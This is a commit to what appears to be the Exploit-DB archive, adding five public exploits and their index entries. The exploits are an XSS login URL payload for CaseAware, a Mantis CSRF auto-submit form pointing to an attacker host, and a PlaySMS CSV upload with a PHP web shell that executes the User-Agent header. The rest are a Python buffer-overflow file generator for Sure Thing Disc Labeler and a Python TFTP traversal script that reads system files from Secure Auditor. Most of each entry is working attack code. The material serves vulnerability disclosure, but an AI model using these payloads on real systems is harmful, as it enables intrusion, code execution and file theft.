DB: 2017-05-22

5 new exploits

Sure Thing Disc Labeler 6.2.138.0 - Buffer Overflow (PoC)

Secure Auditor 3.0 - Directory Traversal
KMCIS CaseAware - Cross-Site Scripting
Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery
PlaySMs 1.4 - 'import.php' Remote Code Execution
This commit is contained in:
Offensive Security 2017-05-22 05:01:18 +00:00
parent df07287e80
commit 6351914249
6 changed files with 401 additions and 0 deletions

View file

@ -5503,6 +5503,7 @@ id,file,description,date,author,platform,type,port
42019,platforms/multiple/dos/42019.txt,"Adobe Flash - Out-of-Bounds Read in Getting TextField Width",2017-05-17,"Google Security Research",multiple,dos,0
42021,platforms/windows/dos/42021.txt,"Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation",2017-05-17,"Google Security Research",windows,dos,0
42027,platforms/multiple/dos/42027.html,"Mozilla Firefox 50 < 55 - Stack Overflow Denial of Service",2017-05-17,"Geeknik Labs",multiple,dos,0
42040,platforms/windows/dos/42040.py,"Sure Thing Disc Labeler 6.2.138.0 - Buffer Overflow (PoC)",2017-05-19,"Chance Johnson",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -15524,6 +15525,7 @@ id,file,description,date,author,platform,type,port
42025,platforms/php/remote/42025.rb,"BuilderEngine 3.5.0 - Arbitrary File Upload and Execution (Metasploit)",2017-05-17,Metasploit,php,remote,80
42026,platforms/xml/remote/42026.py,"Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution",2017-05-17,"Ambionics Security",xml,remote,0
42031,platforms/win_x86-64/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445
42041,platforms/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -37879,3 +37881,6 @@ id,file,description,date,author,platform,type,port
42037,platforms/java/webapps/42037.txt,"ManageEngine ServiceDesk Plus 9.0 - Authentication Bypass",2017-05-19,ByteM3,java,webapps,0
42038,platforms/php/webapps/42038.txt,"PlaySMS 1.4 - Remote Code Execution",2017-05-19,"Touhid M.Shaikh",php,webapps,80
42039,platforms/hardware/webapps/42039.txt,"D-Link DIR-600M Wireless N 150 - Authentication Bypass",2017-05-19,"Touhid M.Shaikh",hardware,webapps,0
42042,platforms/php/webapps/42042.txt,"KMCIS CaseAware - Cross-Site Scripting",2017-05-20,justpentest,php,webapps,0
42043,platforms/php/webapps/42043.txt,"Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery",2017-05-20,hyp3rlinx,php,webapps,0
42044,platforms/php/webapps/42044.txt,"PlaySMs 1.4 - 'import.php' Remote Code Execution",2017-05-21,"Touhid M.Shaikh",php,webapps,0

Can't render this file because it is too large.

27
platforms/php/webapps/42042.txt Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: CaseAware Cross Site Scripting Vulnerability
# Date: 20th May 2017
# Exploit Author: justpentest
# Vendor Homepage: https://caseaware.com/
# Version: All the versions
# Contact: transform2secure@gmail.com
# CVE : 2017-5631
Source: https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle
1) Description:
An issue with respect to input sanitization was discovered in KMCIS
CaseAware. Reflected cross site scripting is present in the user parameter
(i.e., "usr") that is transmitted in the login.php query string. So
bascially username parameter is vulnerable to XSS.
2) Exploit:
https://caseaware.abc.com:4322/login.php?mid=0&usr=admin'><a
HREF="javascript:alert('OPENBUGBOUNTY')">Click_ME<'
----------------------------------------------------------------------------------------
3) References:
https://www.openbugbounty.org/incidents/228262/
https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle

109
platforms/php/webapps/42043.txt Executable file
View file

@ -0,0 +1,109 @@
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt
[+] ISR: ApparitionSec
Vendor:
================
www.mantisbt.org
Product:
=========
Mantis Bug Tracker
1.3.10 / v2.3.0
MantisBT is a popular free web-based bug tracking system. It is written in PHP works with MySQL, MS SQL, and PostgreSQL databases.
Vulnerability Type:
========================
CSRF Permalink Injection
CVE Reference:
==============
CVE-2017-7620
Security Issue:
================
Remote attackers can inject arbitrary permalinks into the mantisbt Web Interface if an authenticated user visits a malicious webpage.
Vuln code in "string_api.php" PHP file, under mantis/core/ did not account for supplied backslashes.
Line: 270
# Check for URL's pointing to other domains
if( 0 == $t_type || empty( $t_matches['script'] ) ||
3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) {
return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php';
}
# Start extracting regex matches
$t_script = $t_matches['script'];
$t_script_path = $t_matches['path'];
Exploit/POC:
=============
<form action="http://VICTIM-IP/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP" method="POST">
<script>document.forms[0].submit()</script>
</form>
OR
<form action="http://VICTIM-IP/permalink_page.php?url=\/ATTACKER-IP%2Fmantisbt-2.3.0%2Fsearch.php%3Fproject_id%3D1%26sticky%3Don%26sort%3Dlast_updated%26dir%3DDESC%26hide_status%3D90%26match_type%3D0" method="POST">
<script>document.forms[0].submit()</script>
</form>
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
=============================
Vendor Notification: April 9, 2017
Vendor Release Fix: May 15, 2017
Vendor Disclosed: May 20, 2017
May 20, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

128
platforms/php/webapps/42044.txt Executable file
View file

@ -0,0 +1,128 @@
# Exploit Title: PlaySMS 1.4 Remote Code Execution using Phonebook import Function in import.php
# Date: 21-05-2017
# Software Link: https://playsms.org/download/
# Version: 1.4
# Exploit Author: Touhid M.Shaikh
# Contact: http://twitter.com/touhidshaikh22
# Website: http://touhidshaikh.com/
# Category: webapps
1. Description
Code Execution using import.php
We know import.php accept file and just read content
not stored in server. But when we stored payload in our backdoor.csv
and upload to phonebook. Its execute our payload and show on next page in field (in NAME,MOBILE,Email,Group COde,Tags) accordingly .
In My case i stored my vulnerable code in my backdoor.csv files's Name field .
But There is one problem in execution. Its only execute in built function and variable which is used in application.
That why the server not execute our payload directly. Now i Use "<?php $a=$_SERVER['HTTP_USER_AGENT']; system($a); ?>" in name field and change our user agent to any command which u want to execute command. Bcz it not execute <?php system("id")?> directly .
Example of my backdoor.csv file content
----------------------MY FILE CONTENT------------------------------------
Name Mobile Email Group code Tags
<?php $t=$_SERVER['HTTP_USER_AGENT']; system($t); ?> 22
--------------------MY FILE CONTENT END HERE-------------------------------
For More Details : www.touhidshaikh.com/blog/
For Video Demo : https://www.youtube.com/watch?v=KIB9sKQdEwE
2. Proof of Concept
Login as regular user (created user using index.php?app=main&inc=core_auth&route=register):
Go to :
http://127.0.0.1/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=list
And Upload my malicious File.(backdoor.csv)
and change our User agent.
This is Form For Upload Phonebook.
----------------------Form for upload CSV file ----------------------
<form action=\"index.php?app=main&inc=feature_phonebook&route=import&op=import\" enctype=\"multipart/form-data\" method=POST>
" . _CSRF_FORM_ . "
<p>" . _('Please select CSV file for phonebook entries') . "</p>
<p><input type=\"file\" name=\"fnpb\"></p>
<p class=text-info>" . _('CSV file format') . " : " . _('Name') . ", " . _('Mobile') . ", " . _('Email') . ", " . _('Group code') . ", " . _('Tags') . "</p>
<p><input type=\"submit\" value=\"" . _('Import') . "\" class=\"button\"></p>
</form>
------------------------------Form ends ---------------------------
-------------Read Content and Display Content-----------------------
case "import":
$fnpb = $_FILES['fnpb'];
$fnpb_tmpname = $_FILES['fnpb']['tmp_name'];
$content = "
<h2>" . _('Phonebook') . "</h2>
<h3>" . _('Import confirmation') . "</h3>
<div class=table-responsive>
<table class=playsms-table-list>
<thead><tr>
<th width=\"5%\">*</th>
<th width=\"20%\">" . _('Name') . "</th>
<th width=\"20%\">" . _('Mobile') . "</th>
<th width=\"25%\">" . _('Email') . "</th>
<th width=\"15%\">" . _('Group code') . "</th>
<th width=\"15%\">" . _('Tags') . "</th>
</tr></thead><tbody>";
if (file_exists($fnpb_tmpname)) {
$session_import = 'phonebook_' . _PID_;
unset($_SESSION['tmp'][$session_import]);
ini_set('auto_detect_line_endings', TRUE);
if (($fp = fopen($fnpb_tmpname, "r")) !== FALSE) {
$i = 0;
while ($c_contact = fgetcsv($fp, 1000, ',', '"', '\\')) {
if ($i > $phonebook_row_limit) {
break;
}
if ($i > 0) {
$contacts[$i] = $c_contact;
}
$i++;
}
$i = 0;
foreach ($contacts as $contact) {
$c_gid = phonebook_groupcode2id($uid, $contact[3]);
if (!$c_gid) {
$contact[3] = '';
}
$contact[1] = sendsms_getvalidnumber($contact[1]);
$contact[4] = phonebook_tags_clean($contact[4]);
if ($contact[0] && $contact[1]) {
$i++;
$content .= "
<tr>
<td>$i.</td>
<td>$contact[0]</td>
<td>$contact[1]</td>
<td>$contact[2]</td>
<td>$contact[3]</td>
<td>$contact[4]</td>
</tr>";
$k = $i - 1;
$_SESSION['tmp'][$session_import][$k] = $contact;
}
}
------------------------------code ends ---------------------------
Bingoo.....
*------------------My Friends---------------------------*
|Pratik K.Tejani, Rehman, Taushif,Charles Babbage |
*---------------------------------------------------*

33
platforms/windows/dos/42040.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: Sure Thing Disc Labeler - Stack Buffer Overflow (PoC)
# Date: 5-19-17
# Exploit Author: Chance Johnson (albatross@loftwing.net)
# Vendor Homepage: http://www.surething.com/
# Software Link: http://www.surething.com/disclabeler
# Version: 6.2.138.0
# Tested on: Windows 7 x64 / Windows 10
#
# Usage:
# Open the project template generated by this script.
# If a readable address is placed in AVread, no exception will be thrown
# and a return pointer will be overwritten giving control over EIP when
# the function returns.
header = '\x4D\x56\x00\xFF\x0C\x00\x12\x00\x32\x41\x61\x33\x08\x00\x5E\x00'
header += '\x61\x35\x41\x61\x36\x41\x61\x37\x41\x61\x38\x41\x61\x39\x41\x62'
header += '\x30\x41\x62\x31\x41\x62\x32\x41\x62\x33\x41\x62\x34\x41\x62\x35'
header += '\x41\x62\x36\x41\x78\x37\x41\x62\x38\x41\x62\x39\x41\x63\x30\x41'
header += '\x0C\x00\x41\x63\x78\x1F\x00\x00\x41\x63\x34\x41\x63\x35\x41\x63'
junk1 = 'D'*10968
EIP = 'A'*4 # Direct RET overwrite
junk2 = 'D'*24
AVread = 'B'*4 # address of any readable memory
junk3 = 'D'*105693
buf = header + junk1 + EIP + junk2 + AVread + junk3
print "[+] Creating file with %d bytes..." % len(buf)
f=open("exp.std",'wb')
f.write(buf)
f.close()

View file

@ -0,0 +1,99 @@
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec
Vendor:
====================
www.secure-bytes.com
Product:
=====================
Secure Auditor - v3.0
Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases
and Cisco devices.
Vulnerability Type:
===================
Directory Traversal
CVE Reference:
==============
CVE-2017-9024
Security Issue:
================
Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a
Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname.
Exploit/POC:
=============
import sys,socket
print 'Secure Auditor v3.0 / Cisco Config Manager'
print 'TFTP Directory Traversal Exploit'
print 'Read ../../../../Windows/system.ini POC'
print 'hyp3rlinx'
HOST = raw_input("[IP]> ")
FILE = '../../../../Windows/system.ini'
PORT = 69
PAYLOAD = "\x00\x01" #TFTP Read
PAYLOAD += FILE+"\x00" #Read system.ini using directory traversal
PAYLOAD += "netascii\x00" #TFTP Type
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()
print "Victim Data located on : %s " %(HOST)
print out.strip()
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
==================================
Vendor Notification: May 10, 2017
No replies
May 20, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx